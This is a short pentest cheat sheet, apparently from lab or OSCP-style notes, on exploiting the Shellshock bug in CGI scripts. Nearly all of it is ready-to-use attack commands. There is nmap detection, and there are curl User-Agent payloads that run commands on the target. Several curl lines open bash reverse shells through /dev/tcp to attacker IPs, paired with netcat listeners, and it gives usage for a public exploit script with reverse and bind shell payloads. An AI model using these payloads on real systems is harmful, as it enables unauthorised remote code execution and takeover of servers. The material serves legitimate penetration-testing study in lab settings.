/cgi-bin Shellshock

#NMAP

ls -lah /usr/share/nmap/scripts/shellshock
sudo nmap 10.11.1.71 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi --script-args uri=/cgi-bin/admin.cgi

#Curl POC to check whether target is vulnerable

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.10.10/cgi-bin/test/test.cgi

#Variant

curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi

#Curl revshell (Kali $ip 10.10.10.10)

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.55.200/443 0>&1' http://192.168.55.87/cgi-bin/test/test.cgi

nc -nvlp 443

Variant : (kali 192.168.119.177)

curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/192.168.119.177/443 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'

#Searchsploit https://www.exploit-db.com/exploits/34900 [1]sudo searchsploit -m linux/remote/34900.py Examples: ./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 ./exploit.py payload=bind rhost=1.2.3.4 rport=1234 [2] Get a pseudo-shell (unstable) ./34900.py payload=reverse rhost=192.168.101.171 lhost=192.168.101.160 lport=1234 pages=/cgi-bin/test Variant: ./exploit.py payload=reverse rhost=10.11.1.71 lhost=192.168.119.177 lport=443 pages=/cgi-bin/test.cgi,/cgi-bin/admin.cgi [3]From initial pseudoshell, send another bash reverse shell back to kali, make sure you select a different port (quad 4) bash -i >& /dev/tcp/192.168.101.160/4444 0>&1 [4]Catch the connection back on kali nc -nvlp 4444

#Fuzzing using gobuster

#Metasploit

#shocker

PreviousphpmyadminNextSar2HTML

Last updated